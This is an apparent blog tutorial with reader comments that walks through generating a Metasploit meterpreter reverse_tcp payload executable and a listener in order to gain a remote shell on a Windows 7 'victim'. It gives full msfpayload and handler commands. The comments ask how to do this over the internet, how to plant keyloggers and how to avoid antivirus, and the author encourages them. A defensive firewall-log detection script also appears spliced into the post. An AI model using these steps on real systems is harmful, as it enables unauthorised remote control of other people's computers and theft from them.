Type : Tutorial
Level : Easy
As I already wrote in my previous post about how to add a user with administrator rights (you can read the tips and tricks here), today I will write a simple tutorial on creating an exploit for Windows 7 and all Windows versions.
Everyone loves the simple way, don't they? That's why in my previous tutorial and in today's tutorial I keep everything simple and easy to use.
In today's tutorial we will learn how to create a simple exploit (easy to create and easy to implement) and how we connect to a Windows 7 victim that has already executed our simple exploit… simple, isn't it?
Okay, let's start the tutorial.
1. Metasploit Framework
2. Windows XP and earlier Windows version (I use Windows 7 SP1)
FYI: in this tutorial I use Backtrack 5 R2 with Metasploit Framework 4.2.0, and my IP address is 192.168.8.91.
1. Open your terminal console and type the following command:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.91 X > Desktop/v4L.exe
The above command will create a Windows executable file named "v4L.exe" and save it on your desktop.
2. Now you need to copy your newly created v4L.exe to your Windows 7 system. If you don't know how to share your Backtrack 5 folder, you can view the tutorial on how to share a folder in Backtrack (view tutorial here).
3. Next we need to create a handler to handle the connection that comes to our Backtrack system from the simple exploit we created earlier. Open your Metasploit console (see the picture) and type the following commands:
Information:
use exploit/multi/handler --> use the Metasploit handler
set payload windows/meterpreter/reverse_tcp --> we use reverse_tcp (see step 1)
set lhost 192.168.8.91 --> set our local IP address that will catch the reverse connection
exploit -j -z --> start the handler
4. Now you can execute the simple exploit we copied to Windows 7 and see whether our handler receives something or not. Below is the screenshot of my handler when Windows 7 executed the simple exploit:
I use sessions -l to list every session that is already open.
5. To interact with an available session, you can use sessions -i <session_id>. From there you can run other commands as you want.
Yes, we're inside Windows 7 now.
1. Install a third-party firewall and antivirus, and keep them always updated.
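For the firewall half of that countermeasure, here is an added detection example (not part of the original tutorial). It parses Windows Firewall log records and flags allowed outbound TCP connections to port 4444, which is Metasploit's default LPORT and is never overridden by the msfpayload command above, or to any port outside an egress allow-list. The sample log, the workstation address 192.168.8.50 and the allow-list are constructed assumptions.

```python
# Added example: triage Windows Firewall log records for outbound reverse_tcp-style traffic.
DEFAULT_HANDLER_PORTS = {4444}    # Metasploit default LPORT, also seen in the comments' handler error
ALLOWED_EGRESS_PORTS = {80, 443}  # assumption: site egress policy, adjust to yours

# Constructed sample in pfirewall.log layout; the last record is deliberately truncated.
SAMPLE_LOG = """\
#Version: 1.5
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2012-05-02 10:14:01 ALLOW TCP 192.168.8.50 192.168.8.1 49160 80 0 - 0 0 0 - - - SEND
2012-05-02 10:14:07 ALLOW TCP 192.168.8.50 192.168.8.91 49162 4444 0 - 0 0 0 - - - SEND
2012-05-02 10:14:09 ALLOW UDP 192.168.8.50 192.168.8.1 55012 53 0 - - - - - - - SEND
2012-05-02 10:14:20 ALLOW TCP 192.168.8.50 192.168.8.1 4444 443 0 - 0 0 0 - - - SEND
2012-05-02 10:15:02 ALLOW TCP 192.168.8.50 203.0.113.10 49170 8081 0 - 0 0 0 - - - SEND
2012-05-02 10:15:30 ALLOW TCP 192.168.8.50
"""

def parse_firewall_log(text):
    """Yield one dict per record, keyed by the log's own #Fields header."""
    fields = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or corrupt records
                yield dict(zip(fields, values))

def classify(record):
    """Return a reason string for a suspicious record, or None if it looks fine."""
    key = (record["action"], record["protocol"], record.get("path"))
    if key != ("ALLOW", "TCP", "SEND") or not record["dst-port"].isdigit():
        return None  # only allowed outbound TCP is of interest here
    port = int(record["dst-port"])  # destination port only; source port 4444 is ignored
    if port in DEFAULT_HANDLER_PORTS:
        return "default-handler-port"
    if port not in ALLOWED_EGRESS_PORTS:
        return "unlisted-egress-port"
    return None

def findings(text):
    """Return (src-ip, dst-ip, dst-port, reason) for every flagged record."""
    return [(r["src-ip"], r["dst-ip"], int(r["dst-port"]), reason)
            for r in parse_firewall_log(text)
            if (reason := classify(r))]

if __name__ == "__main__":
    for finding in findings(SAMPLE_LOG):
        print("ALERT", finding)
```

Windows Firewall only writes ALLOW records when logging of successful connections is enabled. Matching on 4444 alone only catches the default port; the allow-list check is the one that still fires when a different port is used.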
Hope it’s useful
FYI : There’s still another tutorial I will post later about Hacking Remote Desktop.
hi man… nice post! please help me how to make it remotely? on win xp it's possible?
please send to my email *about Hacking Remote Desktop… thanks a lot, I need to learn to work in security test >X
#hair
yes it’s also possible on win XP
Nice post.. but can you tell me how to do this remotely… I have configured my router for port forwarding but don’t know what to do next..
Thanks
#BlackTrminatr
You need to understand how exploits and payloads work. Maybe you can give it a try and see the simple explanation in this tutorial http://www.hacking-tutorial.com/hacking-tutorial/hacking-into-xp-sp3-via-microsoft-office-excel-ms11_021_xlb_bof-vulnerability/ about lport, lhost; and I think this tutorial is clear enough for the basics http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/
hey man, awesome blog!
Quick question, wondering whether it's possible to add a .exe keylogger after the exploit has occurred and place it on the victim's computer and somehow click it so it activates
#nathan
Thanks!
you can view here http://www.hacking-tutorial.com/hacking-tutorial/create-exploit-using-msfvenom-to-hack-windows-7-sp1/
Hey man, I just created an account on 000webhost, a free web hosting site, and there I redirect my own website URL to google.com, but now what do I have to do? I'm not getting to hack a WAN computer. I know I have to create a payload and listener, but what about the server? Please help me.
#Prakash
if you host, then you’ll hack using web app; if you want to hack a victim's PC, then you need to buy your own dedicated Backtrack server or you can view the tutorial here http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/
Gimme steps using web app..i got stuck..
I am using a dongle with a dynamic IP. I am using a host name from no-ip.com to redirect my dynamic IP address, so I typed this to create the .exe file:
"""msfpayload windows/meterpreter/reverse_tcp LHOST=myhostname.zapto.org X > Desktop/v4l.exe"""
and then I set up the handler and payload and set the lhost:
"""set lhost myhostname.zapto.org"""
but when I execute the exploit command there's an error:
"""Handler failed to bind to 180.214.233.37:4444"""
ps: 180.214.233.37 is my current dynamic global IP address
What should I do? Help me please….
I am able to use msf on a virtual LAN. Thanks for your tutorials. But I want to do it over the internet. FYI I don’t have a router, I only have a computer and a dongle. Do you have any idea about the error message I have shown you above? Oh yeah, in spite of the error, I tried to execute the .exe on my friend's computer, but no session appears on the server machine.
Any help would be really appreciated. THANKS
Let's say I will be able to get the file on the victim's computer, how can I use this if the target is in an external location?
#gabeapp
http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/
Hi my friend, I'd like to thank you for this post, and I also appreciate your easy way of explaining things. However, what's the usefulness of this tutorial since it can NEVER bypass any security measures, and why do you specify this attack to Windows 7?? This exe meterpreter can be used on any Microsoft system, ONLY if firewalls & antiviruses are disabled
#shinobi
You didn’t feel the usefulness because you want the fast and easy way.
With all of this you can also build a new one without getting caught by antivirus, but of course for all of it you need to make an effort to learn more after you know the basics.